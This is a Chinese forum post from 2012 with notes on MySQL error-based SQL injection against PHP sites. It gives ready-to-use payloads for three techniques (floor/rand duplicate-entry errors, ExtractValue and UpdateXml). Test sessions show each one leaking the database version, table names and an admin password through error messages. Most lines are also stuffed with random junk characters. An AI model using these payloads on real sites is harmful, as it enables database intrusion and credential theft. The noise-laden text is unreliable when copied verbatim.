放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。6 M) L: E! b6 O- ?
实际测试环境:
9 A0 N9 u. M( \! m9 W3 t
- `7 a- s3 R- ^ - z l: d$ f$ S% Y' p' E1 Q4 z
mysql> show tables;7 E1 l2 }5 \4 m# z
+----------------+
0 D/ r1 e% _3 H4 R" [; k| Tables_in_test |* N: u) a7 ?9 v9 k& y+ k
+----------------+* Y: n: f$ k# ` H9 T
| admin |
/ S0 Y$ ^; C6 y' }- S# K| article |; S o3 `! [8 M& b6 i5 Y( k2 y8 S% y
+----------------+9 \2 _. z: ^1 P0 O7 D) J
1 v! t0 q4 Z3 B7 p' R
' h7 c$ q" S1 ]: S+ t
' L9 e, Y# i" i: |( B# emysql> describe admin;
' [6 X6 a, ^% I, C, g/ v2 S4 V+-------+------------------+------+-----+---------+----------------+& M" M. w/ H$ g' P
| Field | Type | Null | Key | Default | Extra |" R# B# E$ s" H
+-------+------------------+------+-----+---------+----------------+
! _9 R) M3 R/ a( y* f6 H% f. Q- ]' V| id | int(10) unsigned | NO | PRI | NULL | auto_increment |; f/ b9 B. Y) M. @7 p
| user | varchar(50) | NO | | NULL | |
) E2 F: Y' F, h! T, r8 ]/ X) K4 \| pass | varchar(50) | NO | | NULL | |7 j/ V7 {- U. ^5 o: K3 u
+-------+------------------+------+-----+---------+----------------+
' o# b4 C: v( u5 T' _+ W# l1 N4 T
s/ f4 w; V% T 7 x& ]7 h: }: H# E
7 x; X. ~- C, G
mysql> describe article;
8 j9 ]# H! X3 |; E1 M2 ?7 E& V+---------+------------------+------+-----+---------+----------------+
1 m6 K4 r1 l1 m" j| Field | Type | Null | Key | Default | Extra |
" i$ o( ^9 }) N+ }) e) j+---------+------------------+------+-----+---------+----------------+
. b2 S6 p9 a( H/ x, N| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
* y" \" }( }5 q" {| title | varchar(50) | NO | | NULL | |
4 F ^" z: ]8 W) ?) c| content | varchar(50) | NO | | NULL | |* l& [5 X+ I- m8 t8 e3 d
+---------+------------------+------+-----+---------+----------------+
. c- k# P7 I% G" r+ Q f5 y1、通过floor报错
6 \. y7 g# Z% e% I可以通过如下一些利用代码
6 k) I( N b- {: `
; Q7 T# ~- z5 a$ v2 _. S : X1 i; h& I* Q
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
8 O+ k- x# i/ e8 P0 d8 r) Zfrom information_schema.tables group by x)a);& {# A+ B2 Z" n8 f/ a; S! T1 b. V
2 }! I3 ]& n3 y4 C
8 x7 a z: T7 Nand (select count(*) from (select 1 union select null union select !1)x9 Y6 m# F% y2 f
group by concat((select table_name from information_schema.tables limit 1),! j4 a4 n% g+ `
floor(rand(0)*2)));
8 B# o4 w" B h6 Q7 A1 c( V举例如下:; T& z! Q& S# F. ]+ A. ^
首先进行正常查询:" R6 _* c4 ~% h6 m
. E4 X0 V, q. Jmysql> select * from article where id = 1;, \4 W- |. \$ T' s# l/ e' d2 Z( F
+----+-------+---------+
. P+ V2 i1 s! ]% F5 B8 I| id | title | content |4 h! t: s0 X! _# m
+----+-------+---------+
5 ]( }5 a' c. J, P& O z8 X| 1 | test | do it |) T. L! B: e9 F" a
+----+-------+---------+
! t# {- t, Q8 o4 r假如id输入存在注入的话,可以通过如下语句进行报错。" z6 p7 D$ d1 y' h0 O1 J1 J
- I& u: S% h4 I/ a
; U+ ~: r0 d0 a3 E& g/ A: w
mysql> select * from article where id = 1 and (select 1 from
7 H2 r! c' L' W$ k9 G5 {(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
- s# B. n+ ?7 w1 eERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' R" c( W4 \8 F- M% X
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
8 }3 e8 a2 F# s% ?2 u8 x9 L$ F, D例如我们需要查询管理员用户名和密码:" u1 p& S, Z% j# S: ]" Y' o
Method1:
! |* {& B1 I, n* L; i
8 ^, A% |9 c. T& Q 3 T# P% p* S" U
mysql> select * from article where id = 1 and (select 1 from
+ C( q+ p$ h1 N/ U" ~/ F$ |; k3 |$ b6 ?) |(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
3 ^$ d* {3 Y& w" e' J* E0 ofrom information_schema.tables group by x)a);
, U) r9 c# X; o1 k, H5 F& a% QERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'& f s! T* J! H B7 T2 Q# g+ P
Method2:. z7 g1 V7 w9 ?+ F% d, \. z
8 s# m- y! |, p
7 a C/ ^0 Z' qmysql> select * from article where id = 1 and (select count(*)3 T& {* ?, U' b e& V( c8 I3 g
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),- V/ m4 z# }) X% g
floor(rand(0)*2)));# _- P5 {$ w, V+ I2 B9 h
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
" ?4 O* q! e4 ?/ s g2、ExtractValue
* M% P, |- d3 ]: h/ g& U& R% L测试语句如下
, {! B+ @) g4 C. X
- c7 V) X5 P3 \$ Y3 a b& K5 G
" W) ^- G( Q. M: B5 P1 u: rand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));# e3 B2 h$ q0 z
实际测试过程
+ N# u$ F5 d0 I/ x, l, O
! ?3 @7 K# N& C) H5 g1 m % e9 w' u7 C0 L \1 H
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
3 l9 p8 v5 g/ e$ y$ l(select pass from admin limit 1)));--: [3 |0 ?' C3 w! N) u
ERROR 1105 (HY000): XPATH syntax error: '\admin888'3 W+ I g2 d) ]0 I. C9 P0 b
3、UpdateXml
o4 U! \ i I) M. J) T* B3 K* C测试语句+ ?7 `6 e6 m. _% W
" Y M2 E, D6 u. A& O# _
! ~" V9 f; F1 H0 C# s Iand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
3 G& q" {5 c2 c# j实际测试过程
4 Q$ S1 k9 R- o- z
, x# p8 E# K1 m. j . E3 B' c. H0 e! |4 v) \
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
1 |+ T5 M) }. U% c& p* C(select pass from admin limit 1),0x5e24),1));
0 m+ E! `9 a7 ^( D6 F' g4 hERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
3 F; z* {9 ^6 O+ T, j' LAll, thanks foreign guys.6 }% F j8 |4 P" u( W/ ^
# w, o: j" C; [% J5 ]4 w
h1 _; ?( c4 E |
发表于 2012-12-10 10:28:51
收藏
支持
反对